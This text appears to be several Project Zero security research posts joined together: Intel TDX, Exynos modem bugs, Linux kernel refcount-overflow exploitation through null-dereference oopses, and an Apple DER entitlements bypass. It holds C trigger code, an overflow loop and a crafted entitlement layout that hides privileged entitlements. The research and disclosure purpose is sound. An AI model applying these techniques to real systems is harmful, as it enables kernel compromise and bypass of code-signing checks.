Today, members of Google Project Zero and Google Cloud are releasing a report on a security review of Intel's Trust Domain Extensions (TDX). TDX is a feature introduced to support Confidential Computing by providing hardware isolation of virtual machine guests at runtime. This isolation is achieved by securing sensitive resources, such as guest physical memory. This restricts what information is exposed to the hosting environment.
The security review was performed in cooperation with Intel engineers on pre-release source code for version 1.0 of the TDX feature. This code is the basis for the TDX implementation which will be shipping in limited SKUs of the 4th Generation Intel Xeon Scalable CPUs.
The result of the review was the discovery of 10 confirmed security vulnerabilities which were fixed before the final release of products with the TDX feature. The final report highlights the most interesting of these issues and provides an overview of the feature's architecture. 5 additional areas were identified for defense-in-depth changes to subsequent versions of TDX.
You can read more details about the review on the Google Cloud security blog and the final report. If you would like to review the source code yourself, Intel has made it available on the TDX website.
In late 2022 and early 2023, Project Zero reported eighteen 0-day vulnerabilities in Exynos Modems produced by Samsung Semiconductor. The four most severe of these eighteen vulnerabilities (CVE-2023-24033, CVE-2023-26496, CVE-2023-26497 and CVE-2023-26498) allowed for Internet-to-baseband remote code execution. Tests conducted by Project Zero confirm that those four vulnerabilities allow an attacker to remotely compromise a phone at the baseband level with no user interaction, and require only that the attacker know the victim's phone number. With limited additional research and development, we believe that skilled attackers would be able to quickly create an operational exploit to compromise affected devices silently and remotely.
The fourteen other related vulnerabilities (CVE-2023-26072, CVE-2023-26073, CVE-2023-26074, CVE-2023-26075, CVE-2023-26076 and nine other vulnerabilities that are yet to be assigned CVE-IDs) were not as severe, as they require either a malicious mobile network operator or an attacker with local access to the device.
Affected devices
Samsung Semiconductor's advisories provide the list of Exynos chipsets that are affected by these vulnerabilities. Based on information from public websites that map chipsets to devices, affected products likely include:
Mobile devices from Samsung, including those in the S22, M33, M13, M12, A71, A53, A33, A21s, A13, A12 and A04 series;
Mobile devices from Vivo, including those in the S16, S15, S6, X70, X60 and X30 series;
The Pixel 6 and Pixel 7 series of devices from Google; and
Any vehicles that use the Exynos Auto T5123 chipset.
Patch timelines
We expect that patch timelines will vary per manufacturer (for example, affected Pixel devices have received a fix for all four of the severe Internet-to-baseband remote code execution vulnerabilities in the March 2023 security update). In the meantime, users with affected devices can protect themselves from the baseband remote code execution vulnerabilities mentioned in this post by turning off Wi-Fi calling and Voice-over-LTE (VoLTE) in their device settings, although the ability to change these settings can depend on the carrier. As always, we encourage end users to update their devices as soon as possible, to ensure that they are running the latest builds that fix both disclosed and undisclosed security vulnerabilities.
Four vulnerabilities being withheld from disclosure
Under our standard disclosure policy, Project Zero discloses security vulnerabilities to the public a set time after reporting them to a software or hardware vendor. In some rare cases where we have assessed attackers would benefit significantly more than defenders if a vulnerability was disclosed, we have made an exception to our policy and delayed disclosure of that vulnerability.
Due to a very rare combination of level of access these vulnerabilities provide and the speed with which we believe a reliable operational exploit could be crafted, we have decided to make a policy exception to delay disclosure for the four vulnerabilities that allow for Internet-to-baseband remote code execution. We will continue our history of transparency by publicly sharing disclosure policy exceptions, and will add these issues to that list once they are all disclosed.
Related vulnerabilities not being withheld
Of the remaining fourteen vulnerabilities, we are disclosing four vulnerabilities (CVE-2023-26072, CVE-2023-26073, CVE-2023-26074 and CVE-2023-26075) that have exceeded Project Zero's standard 90-day deadline today. These issues have been publicly disclosed in our issue tracker, as they do not meet the high standard to be withheld from disclosure. The remaining ten vulnerabilities in this set have not yet hit their 90-day deadline, but will be publicly disclosed at that point if they are still unfixed.
Changelog
2023-03-21: Removed note at the top of the blog as patches are more widely available for the four severe vulnerabilities. Added additional context that some carriers can control the Wi-Fi calling and VoLTE settings, overriding the ability for some users to change these settings.
2023-03-20: Google Pixel updated their March 2023 Security Bulletin to now show that all four Internet-to-baseband remote code execution vulnerabilities were fixed for Pixel 6 and Pixel 7 in the March 2023 update, not just one of the vulnerabilities, as originally stated.
2023-03-20: Samsung Semiconductor updated their advisories to include three new CVE-IDs, that correspond to the three other Internet-to-baseband remote code execution issues (CVE-2023-26496, CVE-2023-26497 and CVE-2023-26498). The blogpost text was updated to reflect these new CVE-IDs.
2023-03-17: Samsung Semiconductor updated their advisories to remove Exynos W920 as an affected chipset, so we have removed it from the "Affected devices" section.
2023-03-17: Samsung Mobile advised us that the A21s is the correct affected device, not the A21 as originally stated.
2023-03-17: Four of the fourteen less severe vulnerabilities hit their 90-day deadline at the time of publication, not five, as originally stated.
For a fair amount of time, null-deref bugs were a highly exploitable kernel bug class. Back when the kernel was able to access userland memory without restriction, and userland programs were still able to map the zero page, there were many easy techniques for exploiting null-deref bugs. However, with the introduction of modern exploit mitigations such as SMEP and SMAP, as well as mmap_min_addr preventing unprivileged programs from mmap’ing low addresses, null-deref bugs are generally not considered a security issue in modern kernel versions. This blog post provides an exploit technique demonstrating that treating these bugs as universally innocuous often leads to faulty evaluations of their relevance to security.
Kernel oops overview
At present, when the Linux kernel triggers a null-deref from within a process context, it generates an oops, which is distinct from a kernel panic. A panic occurs when the kernel determines that there is no safe way to continue execution, and that therefore all execution must cease. However, the kernel does not stop all execution during an oops - instead the kernel tries to recover as best as it can and continue execution. In the case of a task, that involves throwing out the existing kernel stack and going directly to make_task_dead, which calls do_exit. The kernel will also publish in dmesg a “crash” log and kernel backtrace depicting what state the kernel was in when the oops occurred. This may seem like an odd choice to make when memory corruption has clearly occurred - however the intention is to allow kernel bugs to be more easily detected and logged, under the philosophy that a working system is much easier to debug than a dead one.
The unfortunate side effect of the oops recovery path is that the kernel is not able to perform any associated cleanup that it would normally perform on a typical syscall error recovery path. This means that any locks that were locked at the moment of the oops stay locked, any refcounts remain taken, any memory otherwise temporarily allocated remains allocated, etc. However, the process that generated the oops, its associated kernel stack, task struct and derivative members etc. can and often will be freed, meaning that depending on the precise circumstances of the oops, it’s possible that no memory is actually leaked. This becomes particularly important in regards to exploitation later.
Reference count mismanagement overview
Refcount mismanagement is a fairly well-known and exploitable issue. In the case where software improperly decrements a refcount, this can lead to a classic UAF primitive. The case where software improperly doesn’t decrement a refcount (leaking a reference) is also often exploitable. If the attacker can cause a refcount to be repeatedly improperly incremented, it is possible that given enough effort the refcount may overflow, at which point the software no longer has any remotely sensible idea of how many refcounts are taken on an object. In such a case, it is possible for an attacker to destroy the object by incrementing and decrementing the refcount back to zero after overflowing, while still holding reachable references to the associated memory. 32-bit refcounts are particularly vulnerable to this sort of overflow. It is important, however, that each increment of the refcount allocates little or no physical memory. Even a single-byte allocation is quite expensive if it must be performed 2^32 times.
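As a toy illustration of the wraparound (plain userspace C, not kernel code): 2^32 leaked increments bring a 32-bit counter back to its starting value, so a single legitimate decrement then frees the object while real references remain.

#include <stdint.h>
#include <stdio.h>

int main(void) {
  uint32_t refcount = 1;                /* one legitimate reference held */
  for (uint64_t i = 0; i < (1ull << 32); i++)
    refcount++;                         /* 2^32 leaked increments wrap the counter */
  printf("refcount = %u\n", refcount);  /* prints 1: one more "put" now frees it */
  return 0;
}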
Example null-deref bug
When a kernel oops unceremoniously ends a task, any refcounts that the task was holding remain held, even though all memory associated with the task may be freed when the task exits. Let’s look at an example - an otherwise unrelated bug I coincidentally discovered in the very recent past:
	show_vma_header_prefix(m, priv->mm->mmap->vm_start, last_vma_end, 0, 0, 0, 0); // the deref of mmap causes a kernel oops here
	seq_pad(m, ' ');
	seq_puts(m, "[rollup]\n");

	__show_smap(m, &mss, true);

	release_task_mempolicy(priv);
	mmap_read_unlock(mm);

out_put_mm:
	mmput(mm);
out_put_task:
	put_task_struct(priv->task);
	priv->task = NULL;

	return ret;
}
This file is intended simply to print a set of memory usage statistics for the respective process. Regardless, this bug report reveals a classic and otherwise innocuous null-deref bug within this function. In the case of a task that has no VMA’s mapped at all, the task’s mm_struct mmap member will be equal to NULL. Thus the priv->mm->mmap->vm_start access causes a null dereference and consequently a kernel oops. This bug can be triggered by simply read’ing /proc/[pid]/smaps_rollup on a task with no VMA’s (which itself can be stably created via ptrace):
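A rough sketch of the trigger (an illustrative reconstruction, not the original proof of concept; error handling omitted):

#include <fcntl.h>
#include <stdio.h>
#include <sys/mman.h>
#include <sys/ptrace.h>
#include <sys/types.h>
#include <unistd.h>

int main(void) {
  pid_t pid = fork();
  if (pid == 0) {
    ptrace(PTRACE_TRACEME, 0, 0, 0);
    /* unmap the entire address space; the fault on return from munmap
     * delivers SIGSEGV, which (since we are traced) puts us into tracing
     * stop with an empty VMA list instead of killing us */
    munmap((void *)0x1000, (1ul << 47) - 0x2000);
  }
  sleep(1); /* crude: wait for the child's munmap to complete */
  char path[64], buf[256];
  snprintf(path, sizeof(path), "/proc/%d/smaps_rollup", pid);
  int fd = open(path, O_RDONLY);
  read(fd, buf, sizeof(buf)); /* null-deref: this process dies in the oops */
  return 0;                   /* never reached */
}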
This kernel oops will mean that the following events occur:
The associated struct file will have a refcount leaked if fdget took a refcount (we’ll try and make sure this doesn’t happen later)
The associated seq_file within the struct file has a mutex that will forever be locked (any future reads/writes/lseeks etc. will hang forever).
The task struct associated with the smaps_rollup file will have a refcount leaked
The mm_struct’s mm_users refcount associated with the task will be leaked
The mm_struct’s mmap lock will be permanently readlocked (any future write-lock attempts will hang forever)
Each of these conditions is an unintentional side-effect that leads to buggy behaviors, but not all of those behaviors are useful to an attacker. The permanent locking in conditions 2 and 5 only makes exploitation more difficult. Condition 1 is unexploitable because we cannot leak the struct file refcount again without taking a mutex that will never be unlocked. Condition 3 is unexploitable because a task struct uses a safe saturating kernel refcount_t which prevents the overflow condition. This leaves condition 4.
The mm_users refcount still uses an overflow-unsafe atomic_t and, since we can take a readlock an indefinite number of times, the associated mmap_read_lock does not prevent us from incrementing the refcount again. There are a couple of important roadblocks we need to avoid in order to repeatedly leak this refcount:
We cannot call this syscall from the task with the empty vma list itself - in other words, we can’t call read from /proc/self/smaps_rollup. Such a process cannot easily make repeated syscalls since it has no virtual memory mapped. We avoid this by reading smaps_rollup from another process.
We must re-open the smaps_rollup file every time because any future reads we perform on a smaps_rollup instance we already triggered the oops on will deadlock on the local seq_file mutex lock which is locked forever. We also need to destroy the resulting struct file (via close) after we generate the oops in order to prevent untenable memory usage.
If we access the mm through the same pid every time, we will run into the task struct’s max refcount before we overflow the mm_users refcount. Thus we need to create two separate tasks that share the same mm and balance the oopses we generate across both tasks so the task refcounts grow half as quickly as the mm_users refcount. We do this via the clone flag CLONE_VM.
We must avoid opening/reading the smaps_rollup file from a task that has a shared file descriptor table, as otherwise a refcount will be leaked on the struct file itself. This isn’t difficult, just don’t read the file from a multi-threaded process.
Our final refcount leaking overflow strategy is as follows:
Process A forks a process B
Process B issues PTRACE_TRACEME so that when it segfaults upon return from munmap it won’t go away (but rather will enter tracing stop)
Process B clones with CLONE_VM | CLONE_PTRACE another process C
Process B munmap’s its entire virtual memory address space - this also unmaps process C’s virtual memory address space.
Process A forks new children D and E which will access (B|C)’s smaps_rollup file respectively
(D|E) opens (B|C)’s smaps_rollup file and performs a read which will oops, causing (D|E) to die. mm_users will be refcount leaked/incremented once per oops
Process A goes back to step 5 ~2^32 times (a compact sketch of this loop follows)
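The loop (steps 5-7) might look roughly like this, assuming b and c hold the pids of processes B and C from the setup above and the usual headers are included (illustrative, not the original PoC):

for (uint64_t i = 0; i < (1ull << 32); i++) {
  pid_t target = (i & 1) ? b : c;   /* balance task struct refcount leaks across B and C */
  if (fork() == 0) {                /* short-lived reader, process D or E */
    char path[64], buf[16];
    snprintf(path, sizeof(path), "/proc/%d/smaps_rollup", target);
    int fd = open(path, O_RDONLY);
    read(fd, buf, sizeof(buf));     /* oops: leaks one mm_users reference */
    _exit(1);                       /* never reached; the reader dies in the oops */
  }
  wait(NULL);                       /* reap the dead reader */
}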
The above strategy can be rearchitected to run in parallel (across processes not threads, because of roadblock 4) and improve performance. On server setups that print kernel logging to a serial console, generating 2^32 kernel oopses takes over 2 years. However on a vanilla Kali Linux box using a graphical interface, a demonstrative proof-of-concept takes only about 8 days to complete! At the completion of execution, the mm_users refcount will have overflowed and be set to zero, even though this mm is currently in use by multiple processes and can still be referenced via the proc filesystem.
Exploitation
Once the mm_users refcount has been set to zero, triggering undefined behavior and memory corruption should be fairly easy. By triggering an mmget and an mmput (which we can very easily do by opening the smaps_rollup file once more) we should be able to free the entire mm and cause a UAF condition:
static inline void __mmput(struct mm_struct *mm)
{
	VM_BUG_ON(atomic_read(&mm->mm_users));

	uprobe_clear_state(mm);
	exit_aio(mm);
	ksm_exit(mm);
	khugepaged_exit(mm);
	exit_mmap(mm);
	mm_put_huge_zero_page(mm);
	set_mm_exe_file(mm, NULL);
	if (!list_empty(&mm->mmlist)) {
		spin_lock(&mmlist_lock);
		list_del(&mm->mmlist);
		spin_unlock(&mmlist_lock);
	}
	if (mm->binfmt)
		module_put(mm->binfmt->module);
	lru_gen_del_mm(mm);
	mmdrop(mm);
}
Unfortunately, since 64591e8605 (“mm: protect free_pgtables with mmap_lock write lock in exit_mmap”), exit_mmap unconditionally takes the mmap lock in write mode. Since this mm’s mmap_lock is permanently readlocked many times, any calls to __mmput will manifest as a permanent deadlock inside of exit_mmap.
However, before the call permanently deadlocks, it will call several other functions:
uprobe_clear_state
exit_aio
ksm_exit
khugepaged_exit
Additionally, we can call __mmput on this mm from several tasks simultaneously by having each of them trigger an mmget/mmput on the mm, generating irregular race conditions. Under normal execution, it should not be possible to trigger multiple __mmput’s on the same mm (much less concurrent ones) as __mmput should only be called on the last and only refcount decrement which sets the refcount to zero. However, after the refcount overflow, all mmget/mmput’s on the still-referenced mm will trigger an __mmput. This is because each mmput that decrements the refcount to zero (despite the corresponding mmget being why the refcount was above zero in the first place) believes that it is solely responsible for freeing the associated mm.
This racy __mmput primitive extends to its callees as well. exit_aio is a good candidate for taking advantage of this:
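For reference, here is exit_aio itself, lightly abridged from fs/aio.c as of the affected kernel versions (details may differ slightly between releases). Note that mm->ioctx_table is fetched once at the top and freed only at the very bottom, after the context-killing loop:

void exit_aio(struct mm_struct *mm)
{
	struct kioctx_table *table = rcu_dereference_raw(mm->ioctx_table);
	struct ctx_rq_wait wait;
	int i, skipped;

	if (!table)
		return;

	atomic_set(&wait.count, table->nr);
	init_completion(&wait.comp);

	skipped = 0;
	for (i = 0; i < table->nr; ++i) {
		struct kioctx *ctx =
			rcu_dereference_protected(table->table[i], true);

		if (!ctx) {
			skipped++;
			continue;
		}

		/* kill_ioctx() itself tolerates concurrent callers; slowing
		 * this loop down (by creating many aio contexts) widens the
		 * race window */
		ctx->mmap_size = 0;
		kill_ioctx(mm, ctx, &wait);
	}

	if (!atomic_sub_and_test(skipped, &wait.count)) {
		/* Wait until all IO for the context are done. */
		wait_for_completion(&wait.comp);
	}

	RCU_INIT_POINTER(mm->ioctx_table, NULL);
	kfree(table); /* a second concurrent caller frees the same table: double free */
}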
While the callee function kill_ioctx is written in such a way as to prevent concurrent execution from causing memory corruption (part of the contract of aio allows for kill_ioctx to be called in a concurrent way), exit_aio itself makes no such guarantees. Two concurrent calls of exit_aio on the same mm_struct can consequently induce a double free of the mm->ioctx_table object, which is fetched at the beginning of the function, while only being freed at the very end. This race window can be widened substantially by creating many aio contexts in order to slow down exit_aio’s internal context freeing loop. Successful exploitation will trigger a kernel BUG indicating that a double free has occurred.
Note that as this exit_aio path is hit from __mmput, triggering this race will produce at least two permanently deadlocked processes when those processes later try to take the mmap write lock. However, from an exploitation perspective, this is irrelevant as the memory corruption primitive has already occurred before the deadlock occurs. Exploiting the resultant primitive would probably involve racing a reclaiming allocation in between the two frees of the mm->ioctx_table object, then taking advantage of the resulting UAF condition of the reclaimed allocation. It is undoubtedly possible, although I didn’t take this all the way to a completed PoC.
Conclusion
While the null-dereference bug itself was fixed in October 2022, the more important fix was the introduction of an oops limit which causes the kernel to panic if too many oopses occur. While this patch is already upstream, it is important that distribution kernels also inherit this oops limit and backport it to LTS releases if we want to avoid treating such null-dereference bugs as full-fledged security issues in the future. Even in that best-case scenario, it is nevertheless highly beneficial for security researchers to carefully evaluate the side-effects of bugs discovered in the future that are similarly “harmless” and ensure that the abrupt halt of kernel code execution caused by a kernel oops does not lead to other security-relevant primitives.
Note: The vulnerability discussed here, CVE-2022-42855, was fixed in iOS 15.7.2 and macOS Monterey 12.6.2. While the vulnerability did not appear to be exploitable on iOS 16 and macOS Ventura, iOS 16.2 and macOS Ventura 13.1 nevertheless shipped hardening changes related to it.
Last year, I spent a lot of time researching the security of applications built on top of XMPP, an instant messaging protocol based on XML. More specifically, my research focused on how subtle quirks in XML parsing can be used to undermine the security of such applications. (If you are interested in learning more about that research, I did a talk on it at Black Hat USA 2022. The slides and the recording can be found here and here).
At some point, when a part of my research was published, people pointed out other examples (unrelated to XMPP) where quirks in XML parsing led to security vulnerabilities. One of those examples was a vulnerability dubbed Psychic Paper, a really neat vulnerability in the way Apple operating systems check what entitlements an application has.
Entitlements are one of the core security concepts of Apple’s operating systems. As Apple’s documentation explains, “An entitlement is a right or privilege that grants an executable particular capabilities.” For example, an application on an Apple operating system can’t debug another application without possessing proper entitlements, even if those two applications run as the same user. Even applications running as root can’t perform all actions (such as accessing some of the kernel APIs) without appropriate entitlements.
Psychic Paper was a vulnerability in the way entitlements were checked. Entitlements were stored inside the application’s signature blob in the XML format, so naturally the operating system needed to parse those at some point using an XML parser. The problem was that the OS didn’t have a single parser for this, but rather a staggering four parsers that were used in different places in the operating system. One parser was used for the initial check that the application only has permitted entitlements, and a different parser was later used when checking whether the application has an entitlement to perform a specific action.
When giving my talk on XMPP, I gave a challenge to the audience: Find me two different XML parsers that always, for every input, result in the same output. The reason why that is difficult is because XML, although intended to be a simple format, in reality is anything but simple. So it shouldn’t come as a surprise that a way was found for one of Apple's XML parsers to return one set of entitlements and another parser to see a different set of entitlements when parsing the same entitlements blob.
The fix for the Psychic Paper bug: since the problem occurred because Apple had four XML parsers in the OS, the fix, somewhat ironically, was to add a fifth one.
So, after my XMPP research, when I learned about the Psychic Paper bug, I decided to take a look at these XML parsers and see if I could somehow find another way to trigger the bug even after the fix. After playing with various Apple XML parsers, I had an XML snippet I wanted to try out. However, when I actually tried to use it in an application, I discovered that the system for checking entitlements behaved completely differently than I thought. This was because of…
DER Entitlements
According to Apple developer documentation, “Starting in iOS 15, iPadOS 15, tvOS 15, and watchOS 8, the system checks for a new, more secure signature format that uses Distinguished Encoding Rules, or DER, to embed entitlements into your app’s signature”. As another Apple article boldly proclaims, “The future is DER”.
So, what is DER?
Unlike the previous text-based XML format, DER is a binary format, also commonly used in digital certificates. The format is specified in the X.690 standard.
DER follows relatively simple type-length-data encoding rules, illustrated by a figure in the specification.
The Identifier field encodes the object type, which can be a primitive (e.g. a string or a boolean) or a constructed type (an object containing other objects, e.g. an array/sequence). The Length field encodes the number of bytes in the content; it is encoded differently depending on the size of the content (e.g. if the content is smaller than 128 bytes, the length field takes only a single byte). The length field is followed by the content itself. In the case of constructed types, the content is itself encoded using the same encoding rules.
Each individual entitlement is a sequence which has two elements: a key and a value, e.g. “get-task-allow”:boolean(true). All entitlements are also part of an enclosing constructed type (denoted as “cont [ 16 ]” in an ASN.1 dump of the blob).
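As an illustration, a single entitlement like “get-task-allow”: true would encode along these lines (a hand-assembled example following the rules above, not bytes from a real signature blob):

static const unsigned char entitlement[] = {
    0x30, 0x13,       /* SEQUENCE, 0x13 = 19 content bytes */
    0x0c, 0x0e,       /* UTF8String, 14 bytes */
    'g', 'e', 't', '-', 't', 'a', 's', 'k', '-', 'a', 'l', 'l', 'o', 'w',
    0x01, 0x01, 0xff, /* BOOLEAN, 1 byte, true */
};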
DER is meant to have a unique binary representation, and replacing XML with DER was very likely motivated, at least in part, by preventing issues such as Psychic Paper. But does it necessarily succeed in that goal?
How entitlements are checked
To understand how entitlements are checked, it is useful to also look at the bigger picture and understand what security/integrity checks Apple operating systems perform on binaries before (and in some cases, while) running them.
Integrity information in Apple binaries is stored in a structure called the Embedded Signature Blob. This structure is a container for various other structures that play a role in integrity checking: the digital signature itself, but also entitlements and an important structure called the Code Directory. The Code Directory contains a hash of every page in the binary (up to the Signature Blob), but also other information, including the hash of the entitlements blob. The hash of the Code Directory is called cdHash and it is used to uniquely identify the binary. For example, it is the cdHash that the digital signature actually signs. Since the Code Directory contains a hash of the entitlements blob, any change to the entitlements results in a different cdHash.
As also noted in the Psychic Paper writeup, there are several ways a binary might be signed:
The cdHash of the binary could be in the system’s Trust Cache, which stores the hashes of system binaries.
The binary could be signed by the Apple App Store.
The binary could be signed by the developer, but in that case it must reference a “Provisioning Profile” signed by Apple.
On macOS only, a binary could also be self-signed.
We are mostly interested in the last two cases, because they are the only ones that allow us to provide custom entitlements. However, in those cases, any entitlements a binary has must either be a subset of those allowed by the provisioning profile created by Apple (in the “provisioning profile” case) or entitlements must only contain those whitelisted by the OS (in the self-signed case). That is, unless one has a vulnerability like Psychic Paper.
An entrypoint into file integrity checks is the vnode_check_signature function inside the AppleMobileFileIntegrity kernel extension. AppleMobileFileIntegrity is the kernel component of integrity checking, but there is also a userspace daemon, amfid, which AppleMobileFileIntegrity uses to perform certain actions, as noted further in the text.
We are not going to analyze the full behavior of vnode_check_signature. However, I will highlight the most important actions and those relevant to understanding DER entitlements workflow:
First, vnode_check_signature retrieves the entitlements in the DER format. If the currently loaded binary does not contain DER entitlements and only contains entitlements in the XML format, AppleMobileFileIntegrity calls transmuteEntitlementsInDaemon which uses amfid to convert entitlements from XML into DER format. The conversion itself is done via CFPropertyListCreateWithData (to convert XML to CFDictionary) and CESerializeCFDictionary (which converts CFDictionary to DER representation).
Checks on the signature are performed using the CoreTrust library by calling CTEvaluateAMFICodeSignatureCMS. This process has recently been documented in another vulnerability writeup and will not be examined in detail as it does not relate to entitlements directly.
Additional checks on the signature and entitlements are performed in amfid via the verify_code_directory function. This call will be analyzed in-depth later. One interesting detail about this interaction is that amfid receives the path to the executable as a parameter. In order to prevent race conditions where the file was changed between being loaded by kernel and checked by amfid, amfid returns the cdHash of the checked file. It is then verified that this cdHash matches the cdHash of the file in the kernel.
Provisioning profile information is retrieved and it is checked that the entitlements in the binary are a subset of the entitlements in the provisioning profile. This is done with the CEContextIsSubset function. This step does not appear to be present on macOS running on Intel CPUs; however, even in that case, the entitlements are still checked in amfid, as will be shown below.
The verify_code_directory function of amfid performs (among other things) the following actions:
Parses the binary and extracts all the relevant information for integrity checking. The code that does that is part of the open-source Security library and the two most relevant classes here are StaticCode and SecStaticCode. This code is also responsible for extracting the DER-encoded entitlements. Once again, if only XML-encoded entitlements are present, they get converted to DER format. This is, once again, done by the CFPropertyListCreateWithData and CESerializeCFDictionary pair of functions. Additionally, for later use, entitlements are also converted to CFDictionary representation. This conversion from DER to CFDictionary is done using the CEManagedContextFromCFData and CEQueryContextToCFDictionary function pair.
Checks that the signature signs the correct cdHash and checks the signature itself. The checking of the digital signature certificate chain isn’t actually done by the amfid process; amfid calls into trustd for that.
On macOS, the entitlements contained in the binary are filtered into restricted and unrestricted ones. On macOS, the unrestricted entitlements are com.apple.application-identifier, com.apple.security.application-groups*, com.apple.private.signing-identifier and com.apple.security.*. If the binary contains any entitlements not listed above, it needs to be checked against a provisioning profile. The check here relies on the entitlements CFDictionary, extracted earlier in amfid.
Later, when the binary runs, if the operating system wants to check that the binary contains an entitlement to perform a specific action, it can do this in several ways. The “old way” of doing this is to retrieve a dictionary representation of the entitlements and query the dictionary for a specific key. However, there is also a new API for querying entitlements, where the caller first creates a CEQuery object containing the entitlement key they want to query (and, optionally, the expected value) and then performs the query by calling the CEContextQuery function with the CEQuery object as a parameter. For example, the IOTaskHasEntitlement function, which takes an entitlement name and returns a bool, relies on the latter API.
libCoreEntitlements
You might have noticed that a lot of functions for interacting with DER entitlements start with the letters “CE”, such as CEQueryContextToCFDictionary or CEContextQuery. Here, CE stands for libCoreEntitlements, which is a new library created specifically for DER-encoded entitlements. libCoreEntitlements is present both in the userspace (as libCoreEntitlements.dylib) and in the OS kernel (as a part of AppleMobileFileIntegrity kernel extension). So any vulnerability related to parsing the DER entitlement format would be located there.
“There are no vulnerabilities here”, I declared in one of the Project Zero team meetings. At the time, I based this claim on the following:
There is a single library for parsing DER entitlements, unlike the four/five used for XML entitlements. While there are two versions of the library, in userspace and kernel, those appear to be the same. Thus, there is no potential for parsing differential bugs like Psychic Paper. In addition to this, binary formats are much less susceptible to such issues in the first place.
The library is quite small. I both reviewed and fuzzed the library for memory corruption vulnerabilities and didn’t find anything.
It turns out I was completely wrong (as it often happens when someone declares code is bug free). But first…
Interlude: SHA1 Collisions
After my failure to find a good libCoreEntitlements bug, I turned to other ideas. One thing I noticed when digging into Apple integrity checks is that SHA1 is still supported as a valid hash type for Code Directory / cdHash. Since practical SHA1 collision attacks have been known for some time, I wanted to see if they can somehow be applied to break the entitlement check.
It should be noted that there are two kinds of SHA1 collision attacks:
Identical prefix attacks, where an attacker starts with a common file prefix and then constructs collision blocks such that SHA1(prefix + collision_blocks1) == SHA1(prefix + collision_blocks2).
Chosen prefix attacks, where the attacker starts with two different prefixes chosen by the attacker and constructs collision blocks such that SHA1(prefix1 + collision_blocks1) == SHA1(prefix2 + collision_blocks2).
While both attacks are currently practical against SHA1, the first type is significantly cheaper than the second one. In the SHA-1 is a Shambles paper from 2020, the authors report a “cost of US$ 11k for a (identical prefix) collision, and US$ 45k for a chosen-prefix collision”. So I wanted to see if an identical prefix attack on DER entitlements is possible. Special thanks to Ange Albertini for bringing me up to speed on the current state of SHA1 collision attacks.
My general idea was to
Construct two sets of entitlements that have the same SHA1 hash
Since entitlements will have the same SHA1 hash, the cdHash of the corresponding binaries will also be the same, as long as the corresponding Code Directories use SHA1 as the hash algorithm.
Exploit a race condition and switch the binary between being opened by the kernel and being opened by amfid
If everything goes well, amfid is going to see one set of entitlements and the kernel another set of entitlements, while believing that the binary hasn’t changed.
In order to construct an identical-prefix collision, my plan was to have an entitlements file that contains a long string. The string would declare a 16-bit size and the identical prefix would end right at the place where string length is stored. That way, when a collision is found, lengths of the string in two files would differ. Following the lengths would be more collision data (junk), but that would be considered string content and the parsing of the file would still succeed. Since the length of the string in two files would be different, parsing would continue from two different places in the two files. This idea is illustrated in the following image.
A (failed) idea for exploiting an identical prefix SHA1 collision against DER entitlements. The blue parts of the files are the same, while the green and red parts represent (different) collision blocks.
Except it won’t work.
The reason it won’t work is that every object in DER, including an object that contains other objects, has a size. Once again, hat tip to Ange Albertini who pointed out right away that this is going to be a problem.
Since each individual entitlement is stored in a separate sequence object, with our collision we could change the length of a string inside the sequence object (e.g. a value of some entitlement), but not change the length of the sequence object itself. Having a mismatch between the sequence length and the length of content inside the sequence could, depending on how the parser is implemented, lead to a parsing failure. Alternatively, if the parser was more permissive, the parser would succeed but would continue parsing after the end of the current sequence, so the collision wouldn’t cause different entitlements to be seen in two different files.
Unless the sequence length is completely ignored.
So I took another look at the library, specifically at how sequence length was handled in different parts of the library, and that is when I found the actual bug.
The actual bug
libCoreEntitlements does not implement traversing DER entitlements in a single place. Instead, traversing is implemented in (at least) three different places:
Inside recursivelyValidateEntitlements, called from CEValidate which is used to validate entitlements before being loaded (e.g. CEValidate is called from CEManagedContextFromCFData which was mentioned before). Among other things, CEValidate ensures that entitlements are in alphabetical order and there are no duplicate entitlements.
der_vm_iterate, which is used when converting entitlements to dictionary (CEQueryContextToCFDictionary), but also from CEContextIsSubset.
der_vm_execute_nocopy, which is used when querying entitlements using CEContextQuery API.
The actual bug is that these traversal algorithms behave slightly differently, in particular in how they handle entitlement sequence length. der_vm_iterate behaves correctly: after processing a single key/value sequence, it continues processing after the sequence end (as indicated by the sequence length). recursivelyValidateEntitlements and der_vm_execute_nocopy, however, completely ignore the sequence length (beyond an initial check that it is within bounds of the entitlements blob) and, after processing a single entitlement (key/value sequence), continue processing after the end of the value. This difference in iterating over entitlements is illustrated in the following image.
Illustration of how different algorithms within libCoreEntitlements traverse the same DER structure. der_vm_iterate is shown as green arrows on the left, while der_vm_execute is shown as red arrows on the right. The red parts of the file represent a “hidden” entitlement that is only visible to the second algorithm.
This allowed hiding entitlements by embedding them as children of other entitlements, as shown below. Such entitlements would then be visible to CEValidate and CEContextQuery, but hidden from CEQueryContextToCFDictionary and CEContextIsSubset.
SEQUENCE
  UTF8STRING    :application-identifier
  UTF8STRING    :testapp
  SEQUENCE
    UTF8STRING  :com.apple.private.foo
    UTF8STRING  :bar
SEQUENCE
  UTF8STRING    :get-task-allow
  BOOLEAN       :255
Luckily (for an attacker), the functions used to perform the check that all entitlements in the binary are a subset of those in the provisioning profile wouldn’t see these hidden entitlements, which would only surface when the kernel would query for a presence of a specific entitlement using the CEContextQuery API.
Since CEValidate would also see the “hidden” entitlements, these would need to be in alphabetical order together with “normal” entitlements. However, because generally allowed entitlements such as application-identifier on iOS and com.apple.application-identifier on macOS appear pretty soon in the alphabetical order, this requirement doesn’t pose an obstacle for exploitation.
Exploitation
In order to try to exploit these issues, some tooling was required. Firstly, tooling to create crafted entitlements DER. For this, I created a small utility called createder.cpp which can be used, for example, as follows
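(The invocation below is a hypothetical reconstruction based on the description that follows; the utility’s real syntax may differ.)

createder entitlements.der application-identifier=testapp -- com.apple.private.foo=bar   # hypothetical syntax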
where entitlements.der is the output DER encoded entitlements file, entitlements before “--” are “normal” entitlements and those after “--” are hidden.
Next, I needed a way to embed such crafted entitlements into a signature blob. Normally, for signing binaries, Apple’s codesign utility is used. However, this utility only accepts XML entitlements as input and the user can’t provide a DER blob. At some point, codesign converts the user-provided XML to DER and embeds both in the resulting binary.
I decided the easiest way to embed custom DER in a binary would be to modify codesign behavior, specifically the XML to DER conversion process. To do this, I used TinyInst, a dynamic instrumentation library I developed together with contributors. TinyInst currently supports macOS and Windows.
In order to embed custom DER, I hooked two functions from libCoreEntitlements that are used during XML to DER conversion: CESizeSerialization and CESerialize (CESerializeWithOptions on macOS 13 / iOS 16). The first one computes the size of DER while the second one outputs DER bytes.
